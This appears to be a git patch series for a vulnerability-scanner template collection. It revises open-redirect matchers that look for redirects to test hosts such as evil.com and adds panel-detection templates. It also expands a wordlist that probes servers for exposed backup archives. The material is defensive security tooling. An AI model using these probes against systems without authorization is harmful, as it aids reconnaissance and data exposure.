'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml index ca9dac25e6..3180baf9d7 100644 --- a/cves/2022/CVE-2022-29272.yaml +++ b/cves/2022/CVE-2022-29272.yaml @@ -37,7 +37,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 extractors: - type: regex diff --git a/cves/2022/CVE-2022-32444.yaml b/cves/2022/CVE-2022-32444.yaml index 1460ae469c..d972a2ecba 100644 --- a/cves/2022/CVE-2022-32444.yaml +++ b/cves/2022/CVE-2022-32444.yaml @@ -25,6 +25,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by cs 05/30/2022 diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index b97a3a1213..63e0105696 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -117,7 +117,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: diff --git a/vulnerabilities/other/otobo-open-redirect.yaml b/vulnerabilities/other/otobo-open-redirect.yaml index 6da2460a30..9fba81559b 100644 --- a/vulnerabilities/other/otobo-open-redirect.yaml +++ b/vulnerabilities/other/otobo-open-redirect.yaml @@ -23,6 +23,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/18 diff --git a/vulnerabilities/other/pollbot-redirect.yaml b/vulnerabilities/other/pollbot-redirect.yaml index de0c19ddd3..2716d5f3b4 100644 --- a/vulnerabilities/other/pollbot-redirect.yaml +++ b/vulnerabilities/other/pollbot-redirect.yaml @@ -24,7 +24,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - type: status status: diff --git a/vulnerabilities/wordpress/age-gate-open-redirect.yaml b/vulnerabilities/wordpress/age-gate-open-redirect.yaml index e01165aacc..e3a18091c5 100644 --- a/vulnerabilities/wordpress/age-gate-open-redirect.yaml +++ b/vulnerabilities/wordpress/age-gate-open-redirect.yaml @@ -30,6 +30,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/18 diff --git a/vulnerabilities/wordpress/music-store-open-redirect.yaml b/vulnerabilities/wordpress/music-store-open-redirect.yaml index 3dccaf0c52..e61ef9c8b3 100644 --- a/vulnerabilities/wordpress/music-store-open-redirect.yaml +++ b/vulnerabilities/wordpress/music-store-open-redirect.yaml @@ -25,6 +25,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/18 diff --git a/vulnerabilities/wordpress/newsletter-open-redirect.yaml b/vulnerabilities/wordpress/newsletter-open-redirect.yaml index 8dfa04f118..7c446ea7a4 100644 --- a/vulnerabilities/wordpress/newsletter-open-redirect.yaml +++ b/vulnerabilities/wordpress/newsletter-open-redirect.yaml @@ -21,6 +21,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/04/13 diff --git a/vulnerabilities/wordpress/wp-security-open-redirect.yaml b/vulnerabilities/wordpress/wp-security-open-redirect.yaml index e93ad86cb7..ecd1a6ec5d 100644 --- a/vulnerabilities/wordpress/wp-security-open-redirect.yaml +++ b/vulnerabilities/wordpress/wp-security-open-redirect.yaml @@ -27,6 +27,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/19 From 06e9e0696120ba5abb445faf48960f1eb206ff6e Mon Sep 17 00:00:00 2001 From: Jorian Woltjer Date: Wed, 1 Mar 2023 19:22:21 +0100 Subject: [PATCH 25/84] Add open-directed improvement to more templates --- cves/2016/CVE-2016-10368.yaml | 2 +- cves/2020/CVE-2020-11529.yaml | 2 +- cves/2021/CVE-2021-36580.yaml | 2 +- cves/2021/CVE-2021-44528.yaml | 2 +- vulnerabilities/other/icewarp-open-redirect.yaml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2016/CVE-2016-10368.yaml b/cves/2016/CVE-2016-10368.yaml index 83bb9e950a..463158ef32 100644 --- a/cves/2016/CVE-2016-10368.yaml +++ b/cves/2016/CVE-2016-10368.yaml @@ -31,7 +31,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - type: status status: diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml index c4fcacdf4f..7ce6cdc0d9 100644 --- a/cves/2020/CVE-2020-11529.yaml +++ b/cves/2020/CVE-2020-11529.yaml @@ -25,7 +25,7 @@ requests: matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 part: header # Enhanced by mp on 2022/05/04 diff --git a/cves/2021/CVE-2021-36580.yaml b/cves/2021/CVE-2021-36580.yaml index c2f818a1c7..c3fd4b08bb 100644 --- a/cves/2021/CVE-2021-36580.yaml +++ b/cves/2021/CVE-2021-36580.yaml @@ -20,4 +20,4 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 diff --git a/cves/2021/CVE-2021-44528.yaml b/cves/2021/CVE-2021-44528.yaml index eb07ead21a..8fa9e5b665 100644 --- a/cves/2021/CVE-2021-44528.yaml +++ b/cves/2021/CVE-2021-44528.yaml @@ -28,7 +28,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - type: status status: diff --git a/vulnerabilities/other/icewarp-open-redirect.yaml b/vulnerabilities/other/icewarp-open-redirect.yaml index 51c76e83fb..9dfd088c90 100644 --- a/vulnerabilities/other/icewarp-open-redirect.yaml +++ b/vulnerabilities/other/icewarp-open-redirect.yaml @@ -30,7 +30,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 extractors: - type: regex From 06580972bca50e3d2e121eb59a61f2934746b998 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 1 Mar 2023 19:24:20 +0100 Subject: [PATCH 26/84] Add template --- .../axway-securetransport-webclient.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/axway-securetransport-webclient.yaml diff --git a/exposed-panels/axway-securetransport-webclient.yaml b/exposed-panels/axway-securetransport-webclient.yaml new file mode 100644 index 0000000000..08b4d960cc --- /dev/null +++ b/exposed-panels/axway-securetransport-webclient.yaml @@ -0,0 +1,28 @@ +id: axway-securetransport-webclient + +info: + name: AXWAY Secure Transport Web Client Panel - Detect + author: righettod + severity: info + description: AXWAY Secure Transport Web Client panel was detected. + reference: + - https://www.axway.com/en/products/managed-file-transfer/securetransport + tags: panel,axway,securetransport + +requests: + - method: GET + path: + - '{{BaseURL}}/html/skin/ric/C/config/default.config.json' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ST Web Client" + condition: and + + - type: status + status: + - 200 + From c5f2dc3b1748a6de6dbc81ce169238d9a3edb919 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 1 Mar 2023 19:32:09 +0100 Subject: [PATCH 27/84] Fix linter error --- exposed-panels/axway-securetransport-webclient.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/axway-securetransport-webclient.yaml b/exposed-panels/axway-securetransport-webclient.yaml index 08b4d960cc..285c9d129a 100644 --- a/exposed-panels/axway-securetransport-webclient.yaml +++ b/exposed-panels/axway-securetransport-webclient.yaml @@ -4,7 +4,7 @@ info: name: AXWAY Secure Transport Web Client Panel - Detect author: righettod severity: info - description: AXWAY Secure Transport Web Client panel was detected. + description: AXWAY Secure Transport Web Client panel was detected. reference: - https://www.axway.com/en/products/managed-file-transfer/securetransport tags: panel,axway,securetransport @@ -25,4 +25,3 @@ requests: - type: status status: - 200 - From 23c96a407e03815a4f97608c2cdc926791cf5644 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 1 Mar 2023 19:51:32 +0100 Subject: [PATCH 28/84] Add template --- exposed-panels/axway-securetransport.yaml | 31 +++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposed-panels/axway-securetransport.yaml diff --git a/exposed-panels/axway-securetransport.yaml b/exposed-panels/axway-securetransport.yaml new file mode 100644 index 0000000000..7901c07d64 --- /dev/null +++ b/exposed-panels/axway-securetransport.yaml @@ -0,0 +1,31 @@ +id: axway-securetransport + +info: + name: AXWAY Secure Transport Panel - Detect + author: righettod + severity: info + description: AXWAY Secure Transport panel was detected. + reference: + - https://www.axway.com/en/products/managed-file-transfer/securetransport + metadata: + verified: true + shodan-query: title:"Acunetix" + tags: panel,axway,securetransport + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SecureTransport" + - "Axway SecureTransport" + condition: and + + - type: status + status: + - 200 From a9613552f51ed33f35fc336b755d6519d05e8727 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 1 Mar 2023 19:53:03 +0100 Subject: [PATCH 29/84] Fix shodan query --- exposed-panels/axway-securetransport.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/axway-securetransport.yaml b/exposed-panels/axway-securetransport.yaml index 7901c07d64..cd570a2b63 100644 --- a/exposed-panels/axway-securetransport.yaml +++ b/exposed-panels/axway-securetransport.yaml @@ -9,7 +9,7 @@ info: - https://www.axway.com/en/products/managed-file-transfer/securetransport metadata: verified: true - shodan-query: title:"Acunetix" + shodan-query: title:"SecureTransport" tags: panel,axway,securetransport requests: From 6f6b9aa61c9f9402ac6e5bb2dd3961e9ab969f74 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 Mar 2023 04:02:11 +0000 Subject: [PATCH 30/84] Auto WordPress Plugins Update [Thu Mar 2 04:02:11 UTC 2023] :robot: --- helpers/wordpress/plugins/complianz-gdpr.txt | 2 +- helpers/wordpress/plugins/cookie-notice.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/so-widgets-bundle.txt | 2 +- helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/wordfence.txt | 2 +- helpers/wordpress/plugins/wp-maintenance-mode.txt | 2 +- 9 files changed, 9 insertions(+), 9 deletions(-) diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt index 306894a15e..04757a5d3c 100644 --- a/helpers/wordpress/plugins/complianz-gdpr.txt +++ b/helpers/wordpress/plugins/complianz-gdpr.txt @@ -1 +1 @@ -6.4.1 \ No newline at end of file +6.4.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-notice.txt b/helpers/wordpress/plugins/cookie-notice.txt index 62e64205bf..48a6b508dc 100644 --- a/helpers/wordpress/plugins/cookie-notice.txt +++ b/helpers/wordpress/plugins/cookie-notice.txt @@ -1 +1 @@ -2.4.6 \ No newline at end of file +2.4.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 462d212d88..5fb2f3ec72 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -15.2.3 \ No newline at end of file +15.2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index 4ffb4e1938..87e5fea55f 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.0.19 \ No newline at end of file +3.0.20 \ No newline at end of file diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index 006d33e127..f89a0f9860 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.46.5 \ No newline at end of file +1.46.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt b/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt index 67a331cfd1..513314c62a 100644 --- a/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt +++ b/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt @@ -1 +1 @@ -1.2.22 \ No newline at end of file +1.2.23 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 1e20ec35c6..d41f08f1f3 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -5.4.0 \ No newline at end of file +5.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordfence.txt b/helpers/wordpress/plugins/wordfence.txt index 84c5308f03..ac2f3747d9 100644 --- a/helpers/wordpress/plugins/wordfence.txt +++ b/helpers/wordpress/plugins/wordfence.txt @@ -1 +1 @@ -7.9.0 \ No newline at end of file +7.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-maintenance-mode.txt b/helpers/wordpress/plugins/wp-maintenance-mode.txt index e46a05b196..68167133b9 100644 --- a/helpers/wordpress/plugins/wp-maintenance-mode.txt +++ b/helpers/wordpress/plugins/wp-maintenance-mode.txt @@ -1 +1 @@ -2.6.4 \ No newline at end of file +2.6.5 \ No newline at end of file From 172af5c012a0b18ceb92e9758f57d4ed452fd028 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 2 Mar 2023 11:57:33 +0530 Subject: [PATCH 31/84] minor -update --- exposed-panels/axway-securetransport.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/exposed-panels/axway-securetransport.yaml b/exposed-panels/axway-securetransport.yaml index cd570a2b63..b74fe7a937 100644 --- a/exposed-panels/axway-securetransport.yaml +++ b/exposed-panels/axway-securetransport.yaml @@ -8,9 +8,11 @@ info: reference: - https://www.axway.com/en/products/managed-file-transfer/securetransport metadata: - verified: true - shodan-query: title:"SecureTransport" - tags: panel,axway,securetransport + verified: "true" + shodan-query: + - http.title:"SecureTransport" + - http.favicon.hash:1330269434 + tags: panel,login,axway,securetransport requests: - method: GET From 753cf69312895e76316ebfbeb902b1cfc44e6498 Mon Sep 17 00:00:00 2001 From: QAQ <104293903+pwnhxl@users.noreply.github.com> Date: Thu, 2 Mar 2023 14:40:18 +0800 Subject: [PATCH 32/84] update zip-backup-files (#6816) --- exposures/backups/zip-backup-files.yaml | 36 ++++++++++++++++++++----- 1 file changed, 30 insertions(+), 6 deletions(-) diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 97aebf8bca..22de7570b6 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -2,7 +2,7 @@ id: zip-backup-files info: name: Compressed Backup File - Detect - author: toufik-airane,dwisiswant0,ffffffff0x + author: toufik-airane,dwisiswant0,ffffffff0x,pwnhxl severity: medium description: Multiple compressed backup files were detected. classification: @@ -14,13 +14,36 @@ info: requests: - method: GET path: - - "{{BaseURL}}/{{FQDN}}.{{EXT}}" # www.example.com - - "{{BaseURL}}/{{RDN}}.{{EXT}}" # example.com - - "{{BaseURL}}/{{DN}}.{{EXT}}" # example - - "{{BaseURL}}/{{SD}}.{{EXT}}" # www + - "{{BaseURL}}/{{FILENAME}}.{{EXT}}" - attack: pitchfork + attack: clusterbomb payloads: + FILENAME: + - "{{FQDN}}" # www.example.com + - "{{RDN}}" # example.com + - "{{DN}}" # example + - "{{SD}}" # www + - "{{date_time('%Y')}}" #2023 + - "ROOT" #tomcat + - "wwwroot" + - "htdocs" + - "www" + - "html" + - "web" + - "webapps" + - "public" + - "public_html" + - "uploads" + - "website" + - "api" + - "test" + - "app" + - "backup" + - "bin" + - "bak" + - "old" + - "Release" + EXT: - "7z" - "bz2" @@ -46,6 +69,7 @@ requests: - "sql.zip" - "sql.z" - "sql.tar.z" + - "war" max-size: 500 # Size in bytes - Max Size to read from server response matchers-condition: and From 9fe55ba43823a5bd9a9804a301cdb318e1308c8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 Mar 2023 06:40:36 +0000 Subject: [PATCH 33/84] Auto Generated New Template Addition List [Thu Mar 2 06:40:36 UTC 2023] :robot: --- .new-additions | 657 +------------------------------------------------ 1 file changed, 1 insertion(+), 656 deletions(-) diff --git a/.new-additions b/.new-additions index d38430d8d4..247be82666 100644 --- a/.new-additions +++ b/.new-additions @@ -1,656 +1 @@ -cves/2018/CVE-2018-6184.yaml -cves/2021/CVE-2021-25296.yaml -cves/2021/CVE-2021-25297.yaml -cves/2021/CVE-2021-25298.yaml -cves/2021/CVE-2021-25299.yaml -cves/2021/CVE-2021-30134.yaml -cves/2021/CVE-2021-36580.yaml -cves/2022/CVE-2022-2599.yaml -cves/2022/CVE-2022-28923.yaml -cves/2022/CVE-2022-39952.yaml -cves/2023/CVE-2023-23488.yaml -cves/2023/CVE-2023-23489.yaml -cves/2023/CVE-2023-23752.yaml -cves/2023/CVE-2023-24322.yaml -default-logins/nagios/nagiosxi-default-login.yaml -exposed-panels/c2/covenant-c2.yaml -exposed-panels/c2/deimos-c2.yaml -exposed-panels/c2/metasploit-c2.yaml -exposed-panels/c2/mythic-c2.yaml -exposed-panels/elemiz-network-manager.yaml -exposed-panels/fortinet/fortinet-fortinac-panel.yaml -exposed-panels/freeipa-panel.yaml -exposures/logs/dozzle-container-logs.yaml -exposures/tokens/mapbox/mapbox-token-disclosure.yaml -exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml -file/keys/fcm-api-key.yaml -file/keys/mapbox-token.yaml -file/keys/razorpay-client-id.yaml -file/keys/zapier-webhook.yaml -iot/ampguard-wifi-setup.yaml -misconfiguration/oneinstack-control-center.yaml -misconfiguration/tls-sni-proxy.yaml -misconfiguration/typo3-composer.yaml -osint/1001mem.yaml -osint/21buttons.yaml -osint/247sports.yaml -osint/3dnews.yaml -osint/3dtoday.yaml -osint/7cup.yaml -osint/7dach.yaml -osint/aaha-chat.yaml -osint/aboutme.yaml -osint/acf.yaml -osint/admire-me.yaml -osint/adult-forum.yaml -osint/adultism.yaml -osint/advfn.yaml -osint/aflam.yaml -osint/airline-pilot-life.yaml -osint/airliners.yaml -osint/akniga.yaml -osint/albicla.yaml -osint/alik.yaml -osint/allesovercrypto.yaml -osint/allmylinks.yaml -osint/alloannonces.yaml -osint/alltrails.yaml -osint/ameblo.yaml -osint/americanthinker.yaml -osint/animeplanet.yaml -osint/anobii.yaml -osint/anonup.yaml -osint/apex-legends.yaml -osint/appian.yaml -osint/apteka.yaml -osint/archive-of-our-own-account.yaml -osint/arduino.yaml -osint/armorgames.yaml -osint/artbreeder.yaml -osint/artists-clients.yaml -osint/artstation.yaml -osint/asciinema.yaml -osint/askfm.yaml -osint/audiojungle.yaml -osint/auru.yaml -osint/authorstream.yaml -osint/avid-community.yaml -osint/babepedia.yaml -osint/babypips.yaml -osint/bandcamp.yaml -osint/bandlab.yaml -osint/bblog-ru.yaml -osint/bdsmlr.yaml -osint/bdsmsingles.yaml -osint/behance.yaml -osint/bentbox.yaml -osint/biggerpockets.yaml -osint/bigo-live.yaml -osint/bikemap.yaml -osint/bimpos.yaml -osint/biolink.yaml -osint/bitbucket.yaml -osint/bitchute.yaml -osint/bitcoin-forum.yaml -osint/bittube.yaml -osint/blipfm.yaml -osint/blogger.yaml -osint/blogipl.yaml -osint/blogmarks.yaml -osint/blogspot.yaml -osint/bodybuildingcom.yaml -osint/bonga-cams.yaml -osint/bookcrossing.yaml -osint/boosty.yaml -osint/booth.yaml -osint/breach-forums.yaml -osint/brickset.yaml -osint/bugcrowd.yaml -osint/bunpro.yaml -osint/buymeacoffee.yaml -osint/buzzfeed.yaml -osint/buzznet.yaml -osint/cafecito.yaml -osint/calendy.yaml -osint/cameo.yaml -osint/carbonmade.yaml -osint/careerhabr.yaml -osint/caringbridge.yaml -osint/carrdco.yaml -osint/cashapp.yaml -osint/castingcallclub.yaml -osint/cd-action.yaml -osint/cdapl.yaml -osint/championat.yaml -osint/chamsko.yaml -osint/chaturbate.yaml -osint/cheezburger.yaml -osint/chesscom.yaml -osint/chomikujpl.yaml -osint/chyoa.yaml -osint/climatejusticerocks-mastodon-instance.yaml -osint/cloudflare.yaml -osint/clubhouse.yaml -osint/clusterdafrica.yaml -osint/cnet.yaml -osint/codeberg.yaml -osint/codecademy.yaml -osint/codeforces.yaml -osint/codementor.yaml -osint/coderwall.yaml -osint/codewars.yaml -osint/cohost.yaml -osint/colourlovers.yaml -osint/contactossex.yaml -osint/coroflot.yaml -osint/cowboys4angels.yaml -osint/cracked-io.yaml -osint/cracked.yaml -osint/crevado.yaml -osint/crowdin.yaml -osint/cults3d.yaml -osint/curiouscat.yaml -osint/cytoid.yaml -osint/dailymotion.yaml -osint/darudar.yaml -osint/dateinasia.yaml -osint/datezone.yaml -osint/datingru.yaml -osint/demotywatory.yaml -osint/depop.yaml -osint/designspriation.yaml -osint/destructoid.yaml -osint/deviantart.yaml -osint/devrant.yaml -osint/devto.yaml -osint/dfgames.yaml -osint/diablo.yaml -osint/dibiz.yaml -osint/digitalspy.yaml -osint/diigo.yaml -osint/disabledrocks-mastodon-instance.yaml -osint/discogs.yaml -osint/discourse.yaml -osint/discusselasticco.yaml -osint/discusssocial-mastodon-instance.yaml -osint/disqus.yaml -osint/dissenter.yaml -osint/dockerhub.yaml -osint/dojoverse.yaml -osint/donation-alerts.yaml -osint/dotcards.yaml -osint/dribbble.yaml -osint/droners.yaml -osint/drum.yaml -osint/duolingo.yaml -osint/easyen.yaml -osint/ebay-stores.yaml -osint/ebay.yaml -osint/elloco.yaml -osint/engadget.yaml -osint/eporner.yaml -osint/etoro.yaml -osint/etsy.yaml -osint/expressionalsocial-mastodon-instance.yaml -osint/extralunchmoney.yaml -osint/eyeem.yaml -osint/f3.yaml -osint/fabswingers.yaml -osint/faktopedia.yaml -osint/fancentro.yaml -osint/fandalism.yaml -osint/fandom.yaml -osint/fanpop.yaml -osint/fansly.yaml -osint/fark.yaml -osint/farkascity.yaml -osint/fatsecret.yaml -osint/fcv.yaml -osint/federatedpress-mastodon-instance.yaml -osint/figma.yaml -osint/filmweb.yaml -osint/fine-art-america.yaml -osint/fiverr.yaml -osint/flickr.yaml -osint/flipboard.yaml -osint/flowcode.yaml -osint/fodors-forum.yaml -osint/fortnite-tracker.yaml -osint/forumprawneorg.yaml -osint/fosstodonorg-mastodon-instance.yaml -osint/fotka.yaml -osint/foursquare.yaml -osint/freelancer.yaml -osint/freesound.yaml -osint/friendfinder-x.yaml -osint/friendfinder.yaml -osint/friendweb.yaml -osint/furaffinity.yaml -osint/furiffic.yaml -osint/gab.yaml -osint/game-debate.yaml -osint/gamespot.yaml -osint/garmin-connect.yaml -osint/geocaching.yaml -osint/getmonero.yaml -osint/gettr.yaml -osint/gfycat.yaml -osint/gigapan.yaml -osint/giphy.yaml -osint/girlfriendsmeet.yaml -osint/gitea.yaml -osint/gitee.yaml -osint/giters.yaml -osint/github.yaml -osint/gitlab.yaml -osint/gloriatv.yaml -osint/gnome-extensions.yaml -osint/gpoddernet.yaml -osint/grandprof.yaml -osint/graphicssocial-mastodon-instance.yaml -osint/gravatar.yaml -osint/gumroad.yaml -osint/hackaday.yaml -osint/hacker-news.yaml 